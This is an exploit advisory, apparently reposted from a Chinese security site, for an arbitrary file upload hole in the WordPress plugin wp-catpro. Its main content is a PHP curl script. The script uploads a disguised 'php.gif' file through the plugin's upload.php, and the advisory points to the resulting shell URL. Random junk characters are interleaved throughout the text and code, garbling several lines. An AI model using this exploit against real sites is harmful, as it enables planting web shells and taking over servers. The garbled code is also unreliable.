WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
5 H* {  g5 |$ Y0 Z' ~) D
9 ~+ `' n5 c/ e$ S' B! J0 G作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
) Q7 N  Z. p/ V; B/ X6 s5 B& P; t下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
9 z) P9 R8 |& E, z9 T: q  X. s
% k* X2 \9 Y0 F0 d% z#=> Exploit 信息:
6 Y3 Y! y8 E5 D4 g* v: E; `4 I------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
) V5 W/ e- o3 i/ O/ |% a+ f: |------------------
) c5 Z; a4 f  V7 e
: n; D$ J5 M; r( C1 h+ Z#=> Exploit
-----------
9 d! G! Q" P4 m$ Y6 [5 L& @<?php
' P" S6 q$ ^/ E, }! @
: o' V- d$ s3 m9 K, t8 R5 u0 H/ y$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
5 U: ]. Q" n# l2 x- V' o' vcurl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
+ m2 R- X0 ~; y, P( varray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
( Z' ]+ c. k# r% p3 l, s0 Z$ Zcurl_close($ch);
  t* g5 R% }7 s, R  ~
print "$postResult";

2 B! E6 q1 h6 o- TShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
! d8 d4 V: l/ N  ?>
<?php
3 ^8 o6 C4 l9 ^- o( c( [4 k8 ?phpinfo();
?>